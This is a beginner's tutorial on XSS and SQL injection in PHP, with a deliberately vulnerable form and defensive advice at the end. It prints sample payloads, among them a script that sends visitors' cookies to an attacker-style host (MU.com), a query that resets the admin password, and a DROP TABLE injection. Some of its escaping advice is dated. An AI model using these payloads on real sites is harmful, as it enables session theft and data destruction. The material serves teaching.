Over the past one year, I have been working on PHP and a few other languages and it took me quite some time to actually learn about various types of attacks on web servers and how to avoid them. From then on, I have been helping out others around me and finally decided to write an article on it as well.
So what is code injection or an injection attack? Quoting from Wikipedia:
Code injection is the exploitation of a computer bug that is caused by processing invalid data, which can be used by an attacker to inject code into a computer program to change the course of execution”.
Basically it refers to an unsanitized user input vulnerability, which can be used by a malicious user to run your code in a way it's not intended to. The next question is, why is it necessary to know about them? And the answer is obviously so that your web server/application does not have such vulnerabilities!
This article would give a basic introduction to such attacks, primarily for php applications.
So before proceeding i expect you to know
- HTML
- PHP
- (Some) Javascript
Let us start with something simple. Consider these two files on your server:
index.html
<html>
<body>
<form action='submit.php' method='get'>
Enter your name : <input type='text' name='name' /><br />
<input type='submit' value='Submit' />
</form>
</body>
</html>
and
submit.php:
<?php
echo "welcome ".$_GET['name'];
?>
So you get the user's name in index.php and print it in submit.php. Quite simple and straightforward isn't it? But such a code could make you vulnerable to a dozen attacks!
For example let us say a person (call him MU (malicious user)) wants to try something different and hence inputs:
<h1>MU</h1>
Then the output would be:
let us say MU decides to play a little more and tries to insert some style as well
so he inputs:
<p style=%22color:red;margin-left:20px;font-size:80pt;>MU</p>
And the output he gets is:
You can check out the URL for the input MU gave (since it was a get request).
Now he goes on to trying scripts,
input:
<script>alert('i can run any script i want');</script>
This is a basic example of an XSS(Cross site scripting) attack. Surveys predict that almost 80% of all websites are vulnerable to Xss attacks. He can similarly use the below code to get all cookie data.
<SCRIPT>alert(document.cookie);</SCRIPT>
Now if MU is smart enough he can inject this code to be saved on your site, such that every user runs it. so he modifies it like:
<SCRIPT>document.location=”http://www.MU.com/savecookies.php?cookie=” + document.cookie;</SCRIPT>
To save all users cookies. He can then use this information to hijack sessions of your users and maybe even the administrator. Now say he doesnt like your page design, so he simply inputs:
<SCRIPT>alert(document.body.innerHTML = 'i can add anything i want and desroy your DOM');</SCRIPT>
thus he can modify your webpage anyway he wants!
This is only on the frontend. Now lets say you have saved the names to your database (let us consider using mysql). Assume you have a table called user having all the user details. You extract the data for a user using a simple query
SELECT username, age, phone_number FROM user WHERE username = '$user'
Where, $user is got by user input. Now to prevent revealing data about the admin you put a clause if ($user != 'admin') before you run the SQL query. Now say MU inputs: MU' OR username= 'admin. So the query becomes
SELECT username, age, phone_number FROM user WHERE username = 'MU' OR username= 'admin'';
You just lost your admin information. But trying something a bit more complex, MU enters :
x';
UPDATE users
SET password = 'MUhackedyoursite'
WHERE username = 'admin
Now MU has access to your administrator id. Lets say he doesnt like your site running properly so he now tries: x'; DROP TABLE members; -- . the -- indicates an sql comment. so anything that follows is commented out. So all your user data was just wiped out!
The way to prevent all this must be apparent by now: input validation
- Always escape user input before using them.
- Use functions like addslashes() in PHP to escape strings.
- But it is preferrable to use a DBMS based function like mysql_real_escape_string.
- A better method would be to use parameterized queries or prepared queries.
- When using prepared statements the values are inserted into compiled queries and not into the statements itself. This makes injection impossible.
- Dont store secret data as plain text.
- Always store sensitive data in encrypted form.
- Do not output SQL errors. Errors must reveal minimum information.
- Log your error messages and output a simple error statement.